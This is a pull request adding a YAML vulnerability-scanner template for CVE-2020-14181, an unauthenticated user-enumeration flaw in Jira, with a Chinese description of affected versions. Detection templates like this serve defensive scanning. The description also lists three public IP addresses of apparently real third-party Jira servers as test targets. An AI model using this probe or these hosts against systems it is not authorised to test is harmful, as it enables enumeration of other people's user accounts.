### PR TITLE
poc-yaml-jira-cve-2020-14181

### DIFF
--- a/pocs/jira-cve-2020-14181.yml
+++ b/pocs/jira-cve-2020-14181.yml
@@ -1,11 +1,14 @@
 name: poc-yaml-jira-cve-2020-14181
+set:
+  r: randomLowercase(8)
 rules:
   - method: GET
-    path: /secure/ViewUserHover.jspa?username=test
+    path: /secure/ViewUserHover.jspa?username={{r}}
     follow_redirects: false
     expression: |
-      response.status == 200 && response.body.bcontains(b"/secure/ViewProfile.jspa?name=test")
+      response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira"))
 detail:
   author: whwlsfb(https://github.com/whwlsfb)
   links:
     - https://www.tenable.com/cve/CVE-2020-14181
+    - https://twitter.com/ptswarm/status/1318914772918767619

--- a/pocs/jira-cve-2020-14181.yml
+++ b/pocs/jira-cve-2020-14181.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-jira-cve-2020-14181
+rules:
+  - method: GET
+    path: /secure/ViewUserHover.jspa?username=test
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"/secure/ViewProfile.jspa?name=test")
+detail:
+  author: whwlsfb(https://github.com/whwlsfb)
+  links:
+    - https://www.tenable.com/cve/CVE-2020-14181


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

本Poc是用于检测Jira未授权用户遍历漏洞
详见：https://twitter.com/ptswarm/status/1318914772918767619

## 测试环境

修复前-未找到用户
https://3.121.246.146/secure/ViewUserHover.jspa?username=test
修复前-找到对应用户
https://18.213.73.27/secure/ViewUserHover.jspa?username=test
修复后
https://23.97.173.46/secure/ViewUserHover.jspa?username=test


## 备注

受影响的版本是7.13.6之前的版本，8.5.7之前的版本8.0.0，以及8.12.0之前的版本8.6.0。